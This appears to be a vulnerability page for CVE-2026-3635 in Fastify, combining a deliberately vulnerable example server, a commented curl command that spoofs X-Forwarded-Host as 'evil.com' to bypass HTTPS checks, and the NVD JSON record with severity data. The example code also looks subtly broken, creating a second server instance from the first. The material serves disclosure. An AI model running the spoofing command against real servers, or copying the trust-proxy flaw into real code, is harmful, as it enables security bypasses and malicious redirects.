CVE-2026-3635

// Vulnerable Fastify Server Configuration const fastify = require('fastify')({ logger: true }); // Configure trustProxy to trust only a specific subnet (Restrictive) // In a real scenario, this is intended to trust only the reverse proxy fastify.register(require('@fastify/helmet')); const server = fastify({ trustProxy: (ip) => ip === '10.0.0.1' // Restrictive trust function }); server.get('/', async (request, reply) => { // Vulnerable getters: read headers even from untrusted IPs const protocol = request.protocol; const host = request.host; // Security decision based on spoofed headers if (protocol !== 'https') { return { error: 'HTTPS required', detectedHost: host }; } return { message: 'Success', host: host, protocol: protocol }; }); const start = async () => { try { await server.listen({ port: 3000, host: '0.0.0.0' }); } catch (err) { server.log.error(err); process.exit(1); } }; start(); /* * Attack Scenario (Run from attacker machine): * Direct connection to Fastify, bypassing the trusted proxy. * Command: * curl -H "X-Forwarded-Host: evil.com" -H "X-Forwarded-Proto: https" http://<target-ip>:3000/ * * Result: * The server will treat the request as coming from 'evil.com' via HTTPS, * potentially bypassing security checks or redirecting to malicious URLs. */

{"cve": {"id": "CVE-2026-3635", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-03-23T14:16:34.720", "lastModified": "2026-04-16T17:46:58.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summary\nWhen trustProxy is configured with a restrictive trust function (e.g., a specific IP like trustProxy: '10.0.0.1', a subnet, a hop count, or a custom function), the request.protocol and request.host getters read X-Forwarded-Proto and X-Forwarded-Host headers from any connection — including connections from untrusted IPs. This allows an attacker connecting directly to Fastify (bypassing the proxy) to spoof both the protocol and host seen by the application.\n\nAffected Versions\nfastify <= 5.8.2\n\nImpact\nApplications using request.protocol or request.host for security decisions (HTTPS enforcement, secure cookie flags, CSRF origin checks, URL construction, host-based routing) are affected when trustProxy is configured with a restrictive trust function.\n\nWhen trustProxy: true (trust everything), both host and protocol trust all forwarded headers — this is expected behavior. The vulnerability only manifests with restrictive trust configurations."}, {"lang": "es", "value": "Resumen\nCuando `trustProxy` se configura con una función de confianza restrictiva (por ejemplo, una IP específica como `trustProxy: '10.0.0.1'`, una subred, un recuento de saltos o una función personalizada), los *getters* `request.protocol` y `request.host` leen los encabezados `X-Forwarded-Proto` y `X-Forwarded-Host` de cualquier conexión, incluidas las conexiones de IPs no confiables. Esto permite a un atacante que se conecta directamente a Fastify (saltándose el proxy) suplantar tanto el protocolo como el *host* vistos por la aplicación.\n\nVersiones Afectadas\nfastify &lt;= 5.8.2\n\nImpacto\nLas aplicaciones que utilizan `request.protocol` o `request.host` para decisiones de seguridad (aplicación de HTTPS, *flags* de cookie seguras, comprobaciones de origen CSRF, construcción de URL, enrutamiento basado en *host*) se ven afectadas cuando `trustProxy` se configura con una función de confianza restrictiva.\n\nCuando `trustProxy: true` (confiar en todo), tanto el *host* como el protocolo confían en todos los encabezados reenviados — este es el comportamiento esperado. La vulnerabilidad solo se manifiesta con configuraciones de confianza restrictivas."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.0}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-348"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fastify:fastify:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "5.8.3", "matchCriteriaId": "27A424F7-D048-4767-9071-5C4D0A85FDFA"}]}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/fastify/fastify/security/advisories/GHSA-444r-cwp2-x5xf", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-3635", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Third Party Advisory"]}]}}